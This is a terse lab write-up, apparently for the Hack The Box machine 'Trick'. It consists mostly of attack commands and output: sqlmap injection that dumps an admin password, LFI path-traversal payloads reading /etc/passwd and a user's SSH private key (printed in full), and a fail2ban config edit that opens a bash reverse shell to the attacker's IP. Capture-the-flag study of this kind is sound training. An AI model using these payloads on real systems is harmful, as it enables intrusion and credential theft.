```bash
nmap -sC -sV -oA nmap/trick 10.10.11.166 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-18 20:01 BST
Nmap scan report for 10.10.11.166
Host is up (0.14s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.22 seconds

dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 147 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Fri Jun 24 18:06:03 BST 2022
;; XFR size: 6 records (messages 1, bytes 231)


preprod-payroll.trick.htb 

burp save login request

```
```sql
sqlmap -r request.req --batch

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 210 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Rgwc) AND 'LPwt'='LPwt&password=admin


sqlmap -r request.req --dump --batch

Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

sqlmap -r request.req --dump -D payroll_db -T users --batch
Database: payroll_db
Table: users
[1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| id | doctor_id | name          | type | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+

```

http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=index

gobuster dir -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x php -c "PHPSESSID:17tgbu9m9mqrt0vp5s3j1kili0"
/login.php            (Status: 200) [Size: 5571]
/index.php            (Status: 302) [Size: 9546] [--> login.php]
/ajax.php             (Status: 200) [Size: 0]                   
/home.php             (Status: 200) [Size: 486]                 
/assets               (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/assets/]
/database             (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/database/]
/users.php            (Status: 200) [Size: 2197]                                                
/header.php           (Status: 200) [Size: 2548]                                                
/.                    (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/./]       
/employee.php         (Status: 200) [Size: 2717]                                                
/navbar.php           (Status: 200) [Size: 1382]                                                
/department.php       (Status: 200) [Size: 4844]                                                
/db_connect.php       (Status: 200) [Size: 0]                                                   
/payroll.php          (Status: 200) [Size: 3142]                                                
/position.php         (Status: 200) [Size: 6014]                                                
/topbar.php           (Status: 200) [Size: 585]
/attendance.php       (Status: 200) [Size: 4688]                                                
/site_settings.php    (Status: 200) [Size: 2273]


wfuzz -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://preprod-payroll.trick.htb/" -H "Host: preprod-FUZZ.trick.htb" --hw 475

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000254:   200        178 L    631 W      9660 Ch     "marketing" 


wfuzz -u http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt  --hw 0

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000329:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/
                                                        passwd"                                                                                                                      
000000337:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                                         
000000341:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//etc/passwd"                                                                 
000000340:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//etc/passwd"                                                           
000000339:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//etc/passwd"                                                     
000000336:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                                   
000000338:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                                               
000000335:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                             
000000334:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                       
000000333:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"                 
000000332:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"           
000000331:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"     
000000328:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....
                                                        //etc/passwd"                                                                                                                
000000330:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
                                                        "                                                                                                                            
000000327:   200        41 L     68 W       2351 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....
                                                        //....//etc/passwd"                                                                                                          

Total time: 0
Processed Requests: 920
Filtered Requests: 905
Requests/sec.: 0


http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd


```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash
```
http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

```bash

chmod 600 id_rsa 
ssh -i id_rsa michael@trick.htb

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/

michael@trick:/etc/fail2ban/jail.d$ cat defaults-debian.conf 
[sshd]
enabled = true

michael@trick:/etc/fail2ban/action.d$ cp iptables-multiport.conf /dev/shm

edit file

actionban = bash -c 'bash -i >& /dev/tcp/10.10.14.124/4444 0>&1'

actionunban = bash -c 'bash -i >& /dev/tcp/10.10.14.124/4444 0>&1'

michael@trick:/etc/fail2ban/action.d$ rm iptables-multiport.conf

michael@trick:/etc/fail2ban/action.d$ cp /dev/shm/iptables-multiport.conf .

michael@trick:/etc/fail2ban/action.d$ sudo /etc/init.d/fail2ban restart


flood ssh root@trick.htb

```
